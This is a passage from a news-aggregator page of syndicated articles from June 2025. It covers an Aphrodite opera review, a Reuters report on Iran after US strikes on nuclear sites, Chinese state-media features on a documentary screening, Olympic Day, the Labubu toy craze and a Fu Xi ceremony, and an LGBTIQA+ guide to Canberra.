    By contrast, Aphrodite’s music is bold and forceful, underscoring the goddess’s power and allure. As the narrative unfolds, the musical identities of Ava and Aphrodite intertwine, mirroring the blurring of their characters.

    The collaboration between the Sydney Chamber Opera, Omega Ensemble, and the creative team results in a production that is intellectually stimulating and musically stunning.
    Daniel Boud

    The opera’s success is due in no small part to the extraordinary performances of its two leads. Jessica O’Donoghue is outstanding as Ava, delivering a vocally precise and emotionally raw performance. She captures Ava’s complexities – such as her intellectual sharpness and emotional vulnerability – with extraordinary depth.

    Meechot Marrero is equally phenomenal as Aphrodite. Marrero embodies the goddess’s desirability and power with a commanding stage presence and thrilling vocals.

    Together, O’Donoghue and Marrero create a dynamic interplay that forms the opera’s emotional core.

    A triumph of modern opera

    In Aphrodite, Nico Muhly and Laura Lethlean have created a bold and thought-provoking opera that will resonate deeply with contemporary audiences.

    It is not merely a performance, but an experience that will linger long after the final note. By reframing mythology through a modern lens, it challenges us to reconsider the ideals we uphold, and the myths we live by.

    Aphrodite is a powerful reminder that beauty, like myth, is multifaceted: its power lies not in perfection, but in its ability to challenge, inspire and transform.

    Aphrodite is on at Carriageworks, Sydney, until June 28.

    Laura Case does not work for, consult, own shares in or receive funding from any company or organisation that would benefit from this article, and has disclosed no relevant affiliations beyond their academic appointment.

    – ref. Myth meets modernity in Aphrodite, a striking opera that dissects the links between beauty, power and desire – https://theconversation.com/myth-meets-modernity-in-aphrodite-a-striking-opera-that-dissects-the-links-between-beauty-power-and-desire-257964

    MIL OSI Analysis – EveningReport.nz –

    June 23, 2025
  • Iran weighs retaliation against U.S. for strikes on nuclear sites

    Source: Government of India

    Source: Government of India (4)

    Iran and Israel traded air and missile strikes as the world braced on Monday for Tehran’s response to the U.S. attack on its nuclear sites and U.S. President Donald Trump raised the idea of regime change in the Islamic republic.

    Iran vowed to defend itself on Sunday, a day after the U.S. joined Israel in the biggest Western military action against the country since its 1979 Islamic Revolution, despite calls for restraint and a return to diplomacy from around the world.

    Commercial satellite imagery indicated the U.S. attack on Saturday on Iran’s subterranean Fordow nuclear plant severely damaged or destroyed the deeply buried site and the uranium-enriching centrifuges it housed, but the status of the site remained unconfirmed, experts said.

    In his latest social media comments on the U.S. strikes, Trump said “Monumental Damage was done to all Nuclear sites in Iran.”
    “The biggest damage took place far below ground level. Bullseye!!!” he wrote on his Truth Social platform.

    Trump earlier called on Iran to forgo any retaliation and said the government “must now make peace” or “future attacks would be far greater and a lot easier.”

    The U.S. launched 75 precision-guided munitions including bunker-buster bombs and more than two dozen Tomahawk missiles against three Iranian nuclear sites, chairman of the Joint Chiefs of Staff, General Dan Caine, told reporters.

    The U.N. nuclear watchdog, the International Atomic Energy Agency, said no increases in off-site radiation levels had been reported after the U.S. strikes. Rafael Grossi, the agency’s director general, told CNN that it was not yet possible to assess the damage done underground.

    A senior Iranian source told Reuters that most of the highly enriched uranium at Fordow had been moved elsewhere before the attack. Reuters could not immediately corroborate the claim.

    Tehran, which denies its nuclear programme is for anything other than peaceful purposes, sent a volley of missiles at Israel in the aftermath of the U.S. attack, wounding scores of people and destroying buildings in Tel Aviv.

    But it had not acted on its main threats of retaliation, to target U.S. bases or choke off oil shipments that pass through the Strait of Hormuz.

    Attempting to strangle Gulf oil supply by closing the strait could send global oil prices skyrocketing, derail the world economy and invite conflict with the U.S. Navy’s massive Fifth Fleet based in the Gulf.

    Oil prices jumped on Monday to their highest since January. Brent crude futures rose $1.88 or 2.44% at $78.89 a barrel as of 1122 GMT. U.S. West Texas Intermediate crude advanced $1.87 or 2.53% at $75.71.

    Iran’s parliament has approved a move to close the strait, which Iran shares with Oman and the United Arab Emirates. Iran’s Press TV said closing the strait would require approval from the Supreme National Security Council, a body led by an appointee of Iran’s Supreme Leader Ayatollah Ali Khamenei.

    Caine said the U.S. military had increased protection of troops in the region, including in Iraq and Syria. The U.S. State Department issued a security alert for all U.S. citizens abroad, calling on them to “exercise increased caution.”

    The United States already has a sizeable force in the Middle East, with nearly 40,000 troops and warships that can shoot down enemy missiles.

    The Israeli military reported a missile launch from Iran in the early hours of Monday morning, saying it was intercepted by Israeli defences.

    Air raid sirens blared in Tel Aviv and other parts of central Israel. Iran has repeatedly targeted the Greater Tel Aviv – a metropolitan area of around 4 million people – the business and economic hub of Israel where there are also critical military assets.

    Iranian news agencies reported air defences were activated in central Tehran districts to counter “enemy targets”, and that Israeli air strikes hit Parchin, the location of a military complex southeast of the capital.

    REGIME CHANGE

    In a post to the Truth Social platform on Sunday, Trump raised the idea of regime change in Iran.

    “It’s not politically correct to use the term, ‘Regime Change,’ but if the current Iranian Regime is unable to MAKE IRAN GREAT AGAIN, why wouldn’t there be a Regime change??? MIGA!!!” he wrote.

    Trump’s post came after officials in his administration, including U.S. Vice President JD Vance and Defense Secretary Pete Hegseth, stressed they were not working to overthrow Iran’s government.

    Israeli officials, who began the hostilities with a surprise attack on Iran on June 13, have increasingly spoken of their ambition to topple the hardline Shi’ite Muslim clerical establishment.

    Iranian Foreign Minister Abbas Araqchi is expected to hold talks with Russian President Vladimir Putin in Moscow on Monday. The Kremlin has a strategic partnership with Iran, but also close links with Israel.

    Speaking in Istanbul on Sunday, Araqchi said his country would consider all possible responses and there would be no return to diplomacy until it had retaliated.

    Russia’s foreign ministry condemned the U.S. attacks which it said had undermined the Treaty on the Non-Proliferation of Nuclear Weapons.

    “The risk of the conflict spreading in the Middle East, which is already gripped by multiple crises, has increased significantly,” it said.

    The U.N. Security Council met on Sunday to discuss the U.S. strikes as Russia, China and Pakistan proposed the 15-member body adopt a resolution calling for an immediate and unconditional ceasefire in the Middle East.

    U.N. Secretary-General Antonio Guterres told the Security Council the U.S. bombings in Iran marked a perilous turn in the region and urged a return to negotiations over Iran’s nuclear programme.

    (Reuters)

    June 23, 2025
  • MIL-OSI China: National Geographic screens heartfelt ‘Blink’ at Shanghai film fest

    Source: People’s Republic of China – State Council News

    National Geographic hosted a special screening of its documentary “Blink” on June 20 during the 27th Shanghai International Film Festival, with an executive outlining the brand’s vision for the Chinese market.

    A still from “Blink.” [Photo courtesy of National Geographic]

    Directed by Edmund Stenson and Daniel Roher, “Blink” follows French Canadian couple Edith Lemay and Sebastien Pelletier and their four children — Mia, Leo, Colin and Laurent — after three of the siblings are diagnosed with retinitis pigmentosa, a rare, incurable disease that causes vision loss. To help their children preserve a lifetime of visual memories, the family embarks on a yearlong bucket-list journey across 24 countries, ranging from Botswana and Mongolia to the United States.

    Minimizing air travel and choosing local stays, the family’s adventure includes hot air balloon rides, mountain sunrises and even sipping juice atop a camel. Despite facing an uncertain future, their trip overflows with love, emotional moments, healing and awe — showing that true brightness shines from the memories built on love and hope.

    At its core, “Blink” is a testament to resilience, human connection and living in the moment. The film also raises awareness of retinitis pigmentosa and offers a rare onscreen look at life with visual impairment.

    The Shanghai screening presented the film on the big screen to highlight its bold storytelling and National Geographic’s emphasis on fresh perspectives, Wang Yan, director of branded content at National Geographic, said.

    She added that the event aimed to inspire audiences, echoing the brand’s core message that the spirit of adventure is not just about distant places but also about finding beauty in everyday life through curiosity and kindness.

    “Blink” will have additional screenings during the Shanghai International Film Festival and has received a wave of positive feedback and rave reviews from audiences and critics.

    “This screening is not just about showcasing a film; it is National Geographic’s contemporary interpretation of the spirit of adventure,” Wang said. “We encourage everyone to become a ‘life adventurer’ — to see, discover, cherish, remember and ultimately protect the beauty of our planet.”

    Looking ahead, she said National Geographic will continue to use its lens as a bridge between the distant and the familiar, striving to balance adventure and healing as it opens a new chapter in exploration.

    Wang also outlined National Geographic’s brand strategy. She noted that since its founding in 1888, more than 137 years ago, National Geographic has been dedicated to expanding the boundaries of human knowledge. The organization has documented major scientific milestones, such as early 20th-century expeditions to the Arctic and the rediscovery of the Inca citadel Machu Picchu. 

    Today, as a globally influential documentary entertainment brand, National Geographic aims to continue connecting people and the world through high-quality content in China, awakening a sense of responsibility for the Earth and inspiring curiosity, Wang said.

    Wang Yan, director of branded content at National Geographic, speaks at a screening of “Blink” during the 27th Shanghai International Film Festival, June 20, 2025. [Photo courtesy of National Geographic]

    Wang said National Geographic has consistently collaborated with top documentary creators worldwide. In the past two years, acclaimed theatrical releases such as “Fire of Love” and “Jane” have been introduced in China. The brand has also co-produced hundreds of hours of China-themed content with local partners.

    Documentaries including “Extreme China” and “Ancient China from Above” have been released on National Geographic’s global platforms. Nearly 1,600 hours of original overseas content have also been made available on major domestic streaming platforms such as iQiyi, Bilibili, Tencent Video and Youku, with new shows like “Underdogs” planned for the future.

    Additionally, National Geographic’s outdoor clothing brand entered the Chinese mainland market in 2023, offering products designed for both city life and outdoor activities.

    MIL OSI China News –

    June 23, 2025
  • MIL-OSI China: Let’s move! China celebrates Olympic Day in fitness-for-all activities

    Source: People’s Republic of China – State Council News

    500 participants join a 4.5-kilometer race during a fitness-for-all activity to celebrate International Olympic Day in Beijing, China, June 21, 2025. (Xinhua)

    As an integral part of Beijing Marathon’s classic route, the central avenue between China’s capital city’s iconic dual Olympic venues “Bird’s Nest” and “Water Cube” has long been an attraction for runners.

    On Saturday morning, 500 participants started an event here on the avenue, which was one of the fitness-for-all activities held nationwide to celebrate the upcoming International Olympic Day, which falls on June 23.

    The 4.5-kilometer race took place mainly around the National Stadium, known as the Bird’s Nest, where both the opening and closing ceremonies of the 2008 Beijing Olympics and the 2022 Beijing Winter Olympics were staged. The finish line was near the Beijing Olympic Museum, located south of the stadium.

    Wang Shuchuan, a former triathlete, came to the starting area early in the morning to prepare for his vlog. “I kept exercising and participating in marathon events after my athletic career had ended. I hope to lead more people to join in sporting events through my videos and enlarge our running community,” he said.

    Runner poses for pictures in the central avenue between Beijing’s dual Olympic venues. (Xinhua/Dai Mingxuan)

    The race also attracted the likes of Italy’s Paola Marras, who took part in an event at Beijing’s Olympic Park. “I work in Beijing. During the 2022 Winter Olympics, I watched competitions on TV. The sports atmosphere in Beijing is good, and I like the [tennis] China Open in particular,” she said.

    During the activity, Chinese Olympic champions Ma Long and Zhang Yufei sent their best wishes to sports lovers in an interview.

    China’s swimmer Zhang Yufei (front left) and table tennis player Ma Long (front right) interact with sports lovers. (Xinhua/Dai Mingxuan)

    “Physical exercise is relevant to health. I can feel the public’s enthusiasm for sports. The outstanding performance of Chinese athletes on the international stage is inspiring more people to get involved. Exercise is a lifelong hobby. I hope people can find the sports they love and practice in a healthy and scientific way,” said Ma, 36, China’s most decorated Olympian with six gold medals.

    Swimmer Zhang reflected on her Olympic journey, saying, “At the 2016 Rio Games, I might not have fully understood the significance of the Olympics. Then, after winning gold at Tokyo [2020], I felt the power of our teamwork. Last year at the Paris Olympics, I realized that even though I had made the utmost effort, it was still hard to get corresponding rewards. That is sport.”

    Zhang Yufei (L) takes a group photo with staff members. (Xinhua/Dai Mingxuan)

    “However, what remains unchanged is that the Olympic spirit leads me to pursue my next goal,” Zhang added.

    Established in 1948, the Olympic Day is a global celebration of sport and takes place on June 23 each year to commemorate the day the International Olympic Committee was founded in 1894 – the birth of the modern Olympic Games.

    With the theme of “Let’s Move,” the celebrating activities of Olympic Day were held in 12 cities in China on Saturday, also including Shenzhen, Nanjing, Ningbo, Zhangjiakou and Chengde. A variety of activities such as hiking, running, cycling, football, basketball and table tennis had a wide participation all over the country.

    Li Jing, Deputy Director of the General Administration of Sport of China, said, “At the Paris Olympics, the Chinese delegation achieved its best results in the history of participating in the Olympics abroad, which interpreted the Olympic motto of ‘Faster, Higher, Stronger – Together’ and demonstrated the confidence, optimism, passion, and friendliness of Chinese youth.”

    “Those remarkable moments of Chinese athletes at the Olympics motivated more people to embrace sports activities. Looking ahead, we hope the Chinese sports spirit will continue to shine at the 2026 Milan-Cortina Winter Olympics,” Li noted. 

    MIL OSI China News –

    June 23, 2025
  • MIL-OSI China: Behind Labubu craze: China’s rise as global IP powerhouse

    Source: People’s Republic of China – State Council News

    Toys themed on Labubu, a popular furry doll from Chinese toy company Pop Mart, are pictured during the opening ceremoy of a new offline store of Pop Mart in Bangkok, Thailand, July 5, 2024. (Xinhua/Sun Weitong)

    The shop floor of a pajama factory in Jiangsu Province, east China, had stood still for some time before recently springing back to life, its resurrection kickstarted by a fluffy toy.

    “Labubu was not really my cup of tea, but now I think it is adorable,” said Qiu Zunzun, general manager of Shuofeng daily necessities company in Suzhou, jokingly.

    With its signature spiky toothed grin, Labubu has taken the world by storm. Noticing the craze, Qiu, spotted a gap in the market — outfits for collectors to dress up their fluffy friends. So, he bought some toy samples and cloth, and by the end of May, the factory was rolling out dresses for the little imp.

    “In less than 20 days we produced more than 80 kinds of doll’s dresses, with a turnover of about 170,000 yuan (about 23,643 U.S. dollars).” Qiu estimated that with orders still growing, the monthly sales revenue could reach 1 million yuan.

    The punky, cute, bunny-eared creature from China has inspired fans around the world to line up for a chance to own one. It is the latest case of Chinese IP globalization, which signals a shift in China’s role from a manufacturing hub to a source of original cultural exports, and injects vitality into traditional industries.

    CHINESE IP GOES ABROAD

    Maraid Vintena in Sydney, Australia, lined up for an hour earlier this week to check the Pop Mart Labubu vending machine in her suburb. “There are four Pop Mart vending machines near my house,” she said. “But most of the time, they’re sold out. I check their website like ten times a day… I’m really addicted, but it’s fun.”

    “As you get older, life is a little bit mundane. Something small, like a Labubu, a blind box, is like a little bit of excitement,” Vintena said, explaining why she fell in love with the doll.

    Amid the ever-growing Labubu craze, fashion brand Uniqlo has announced to partner with Pop Mart for their new collection The Monsters.

    It is not the only Chinese IP which gained recognition around the world. From the hit video game “Black Myth: Wukong” last year that amassed 1.04 million concurrent players merely an hour after its debut, to the cinematic marvel of “Ne Zha 2,” which has risen to the fifth spot on the worldwide box office chart, success of Chinese IP shows the rise of both cultural confidence and the empowerment of the country’s industrial system, said Wang Ruotong, a researcher with the Tianjin Foreign Studies University.

    Beyond the cultural sector, a number of Chinese brands have made inroads into the world-class IP categories, from the artificial intelligence (AI) to new energy vehicles and consumer technology.

    Data from China’s General Administration of Customs shows that China sustained its growth momentum on exports of new energy vehicles, with the volume of pure electric car exports topping 2 million units for the first time in 2024.

    Chinese carmaker BYD is establishing factories in Thailand and Mexico, integrating Chinese aesthetics into automotive design.

    In the AI domain, China has made holistic advancements in AI development, fostering a thriving AI industrial ecosystem. The country now hosts over 400 “little giant” firms — specialized small and medium-sized enterprises that excel in niche AI markets, including AI innovator DeepSeek.

    The vibrant growth of creative Chinese IPs has been driven by China’s booming domestic cultural consumption and a solid industrial manufacturing foundation. As China shifts from mass production to smart, high-end manufacturing, the fusion of aesthetics and craftsmanship is driving the country’s manufacturing sector to move up the global value chain.

    In 2024, China’s per-capita expenditure on education, culture, and entertainment registered 3,189 yuan, marking a 9.8-percent increase and accounting for 11.3 percent of total per-capita consumption spending, according to the National Bureau of Statistics. The continuously expanding cultural consumption market is emerging as a robust engine driving the development of China’s IP industry.

    INJECTING VITALITY INTO TRADITIONAL INDUSTRIES

    At Yiwu International Trade Market, buyers carrying black plastic bags walk from one booth to another asking “do you have dresses for Labubu?” The global frenzy for this tiny creature has offered business opportunities for China’s “world supermarket”.

    In Zhu Hui’s store, one could not only find shirts, trousers and skirts for Labubu, but also accessories like glasses and hats. “Our dresses are sold at seven to 15 yuan a piece, while the accessories are one or two yuan each,” she said.

    Zhu’s store opened only half a month ago, with number of orders increasing quickly. “At first we received orders for dozens or several hundred pieces a day, but now it is more than 10,000 pieces,” she said. Zhu has about 50 workers in her factory, all of whom are working overtime recently.

    Inspired by Labubu, other toy producers also tried to make their products more attractive.

    Sun Lijuan is manager of the Yiwu Hongsheng Toys Factory, which exports dolls to more than 80 countries and regions in South America, Middle East, Central Asia, Europe and Africa.

    “Our dolls can talk, sing and tell stories,” she said. Recently they are applying AI technology to create products to meet different needs of consumers.

    Sun told Xinhua that in recent years, they had witnessed the development of new technology which has empowered their business and helped them avoid homogeneous competition. Their toy factory was founded 13 years ago, but in recent years its turnover has been growing steadily.

    “The greatest potential for future IP to go global lies in the continuous development of content and its deep integration with technology,” said Wang Ruotong. “With the maturation of technologies such as AI and virtual reality, the presentation of IP is going towards immersive and interactive experience.”

    “China has a solid foundation in manufacturing,” she continued. “Therefore, the popularity of Labubu this time brought a huge development opportunity to this industry. I’m sure that in the future there will be more Labubus emerging.” 

    MIL OSI China News –

    June 23, 2025
  • MIL-OSI Australia: LGBTIQA+ guide to Canberra

    Source: Northern Territory Police and Fire Services

    • Canberra is Australia’s most welcoming city for the LGBTIQA+ communities.
    • This article lists art and entertainment, events, sports and activities and health related information for LGBTIQA+ communities.

    As the Capital of Equality, Canberra offers a lot for LGBTIQA+ people who call it home.

    For people living here, this isn’t just a saying — it’s something you can see and feel every day. Whether you’ve lived in Canberra your whole life or just moved here, there are many ways to feel safe, meet others, and be yourself.

    Across the city, there are support services, social groups, and events that celebrate LGBTIQA+ communities. You can find places to connect, have fun, and get help if you need it.

    This guide will help you discover a glimpse of what’s out here and how to get involved.

    Art and entertainment

    Canberra Qwire is Canberra’s own LGBTIQA+ choir which celebrates a common love of music and singing. With 120+ members from all walks, you can join the choir or attend a concert.

    SpringOUT is Canberra’s own pride festival held annually in November. While still a little away, the applications to run a range of LGBTIQA+ events or to hold a stall at the Fair Day will soon open.

    FLESH: Queer Life Drawing sessions feature a life model run by and for LGBTIQA+ folks. Join the relaxed, social atmosphere to pursue your own creative approaches.

    Queer Variety Show is a bi-monthly event featuring LGBTIQA+ and disabled performers held at Smith’s Alternative.

    Smith’s Alternative is one of Canberra’s most iconic and loved performance venues. The bar and performing arts cafe celebrate queerness and local culture. Smiths is known for providing a safe and inclusive space. It offers live music, poetry, comedy, burlesque, theatre, drag, queer shows, cabaret, art exhibitions and dance parties.

    She Shapes History is on a mission to promote gender equality through tourism. Join their walking tour to learn about women’s and LGBTIQA+ history of Canberra. You can also listen to the She Shapes History Queer Past podcast about Canberra’s queer history.

    Tuggeranong Arts Centre is a creative hub and gathering place in South Canberra. The centre aims to connect people, create new experiences and celebrate the arts. Keep an eye out for events and workshops.

    Belconnen Arts Centre is an inner-north hub for visual and performing arts classes. As part of the many LGBTIQA+ events and workshops they run, Kaleidescope, an annual exhibition, celebrating LGBTIQA+ experiences.

    Sport and the outdoors

    Queer run CBR is an inclusive community of runners, riders, rollers and strollers. If you are looking to find a space that celebrates LGBTIQA+ folks and allies, look no further.

    ACT Water Polo is an inclusive and diverse club that promotes physical activity and friendship in a safe and judgement free space.

    Pink Tennis is a welcoming group of LGBTIQA+ individuals who encourages people of all abilities to pick up a racquet and join a bunch of queer people in Canberra who like to play tennis.

    Rainbow Racquets Squash is a squash group for LGBTIQA+ people and their allies. They create a relaxed and inclusive space to enjoy squash and connect.

    Canberra Roller Derby League are a competitive flat track roller derby club run by the skaters, for the skaters. They are dedicated to promoting health, sport, community and inclusion.

    Pride Fitness Canberra is a business focused on providing a safe space for community to meet and get active. They offer bootcamp, running meets and post workout coffees.

    Support for LGBTIQA+ communities and their families

    A Gender Agenda is a community organisation that supports intersex, trans, and gender diverse people. Check out their resources and support services.

    Meridian is a community organisation that provides health and social support services to LGBTIQA+ communities.

    Seahorse Playgroup is a local playgroup and community space for LGBTIQA+ parents, carers, and their children.

    Community and support for young LGBTIQA+ people

    Encampment 2025 is a locally run initiative that brings LGBTIQA+ young people aged 13-17 years old together. They help to navigate gender identities and sexualities and strengthen their connection to the community. Check their application dates for 2025/26.

    Bit Bent offers weekly culturally safe and participant-led groups for LGBTIQA+ young people aged 10 to 25. Whether you’re looking for resources, connections, or simply a place to hang out and be with like-minded individuals, they have you covered.

    Rainbow Mob is a local community organisation run for and by Aboriginal and Torres Strait Islander LGBTIQASB+ young people.

    Variations in sex characteristics is a psychosocial service at Canberra Health Services that provides support to children and young people born with sex characteristics that do not fit the typical definitions for male or female bodies.

    Sexual Health and Family Planning ACT (SHFPACT) supports public, private and faith-based schools in Canberra with age-appropriate, accurate and sexuality education. View their resources and education workshops.

    Stun Magazine is a Canberra born and bred queer magazine. New to the scene but already making a huge impact. The magazine covers readers across Sydney, Canberra, Wollongong and Newcastle with high-quality entertainment and queer content.

    FUSE Magazine is a national gay, lesbian bisexual, transgender, intersex and queer lifestyle magazine. It covers everything from news, entertainment, fashion health and social issues.

    LGBTIQA+ Directory is exactly what is sounds like. If you are looking for LGBTIQA+ support, businesses, or community-based connections, look no further.

    ACT Government 

    The Office of LGBTIQA+ Affairs run a community grants program called Capital of Equality Grants, hosts LGBTIQA+ events and engages with LGBTIQA+ communities to help make Canberra the capital of equality.

    For more information visit their website, follow their Facebook page for the Office of LGBTIQA+ Affairs or subscribe to their newsletter.

    MIL OSI News –

    June 23, 2025
  • MIL-OSI China: Ceremonies honor Fu Xi on both sides of Taiwan Strait

    Source: People’s Republic of China – State Council News

    Ma Ying-jeou (3rd from left), former chairman of the Chinese Kuomintang party, and Song Tao (left), head of the Taiwan Work Office of the Communist Party of China Central Committee and the Taiwan Affairs Office of the State Council, participate in a commemorative ceremony honoring Fu Xi, a mythical ancestor of the Chinese people, in Tianshui, Gansu province, on Saturday. [Photo/Xinhua]

    The majority of people in Taiwan hold a strong belief in Chinese culture and identity, which is an enduring virtue, said Ma Ying-jeou, former chairman of the Chinese Kuomintang party, during a commemorative ceremony on the Chinese mainland on Saturday.

    On Saturday morning, the annual ceremony honoring Fu Xi, a mythical ancestor of Chinese civilization, took place at Fu Xi Temple in Tianshui, a city in Northwest China’s Gansu province that is regarded as the birthplace of Fu Xi and the cradle of Fu Xi culture. Paying tribute to Fu Xi is a local tradition in Tianshui that dates back to ancient times.

    Ma and a delegation of students from China’s Taiwan island participated in the ceremony.

    “This is not only a time-honored tradition of the Chinese nation to trace its roots and honor its ancestors, but also a valuable opportunity for young people to experience the profound influence of Chinese culture and civilization,” Ma said after the ceremony.

    The ceremony, which began at 9:50 am, was held simultaneously on both sides of the Taiwan Strait, with a parallel event held at Xianse Temple in New Taipei City in Taiwan. It marked the 12th consecutive cross-Strait joint commemoration of Fu Xi.

    On Saturday, which marked the solar term Summer Solstice, the ceremony began with 34 drumbeats, symbolizing the descendants of Chinese civilization across the 31 provinces, autonomous regions and municipalities on the mainland, as well as the Hong Kong and Macao special administrative regions and Taiwan. A series of solemn rituals followed, including the reading of a eulogy, ceremonial bows and ritual music and dance performances.

    Ma and Song Tao, head of both the Taiwan Work Office of the Communist Party of China Central Committee and the Taiwan Affairs Office of the State Council, attended the ceremony together and paid their respects at the ancestral temple.

    Ma said he brought the student delegation to take part in the ceremony to demonstrate the importance that people in Taiwan place on honoring their ancestors and respecting traditional Chinese culture, and to raise awareness about the need to preserve and pass on the nation’s cultural heritage.

    “I hope that through the solemn tribute to the cultural ancestor of Chinese civilization, young people across the Strait could join hands and work together to build a bright future for the Chinese nation,” Ma said.

    The ceremony in Tianshui drew around 750 participants from home and abroad, including more than 240 compatriots from Taiwan.

    In New Taipei City, Wang Jinpyng, the officiant of the commemorative ceremony and a KMT politician, noted that Fu Xi represents the root of Chinese culture. He expressed the hope that Fu Xi culture could be further promoted on the island to strengthen cultural confidence and identity.

    Lee Chien-lung, who is in charge of Xianse Temple, said that the ceremony served not only to honor the ancestor but also to educate and inspire the younger generation, according to a Xinhua News Agency report.

    MIL OSI China News –

    June 23, 2025
←Previous Page
1 … 82 83 84 85 86 … 403
Next Page→
NewzIntel.com

NewzIntel.com

MIL Open Source Intelligence

  • Blog
  • About
  • FAQs
  • Authors
  • Events
  • Shop
  • Patterns
  • Themes

Twenty Twenty-Five

Designed with WordPress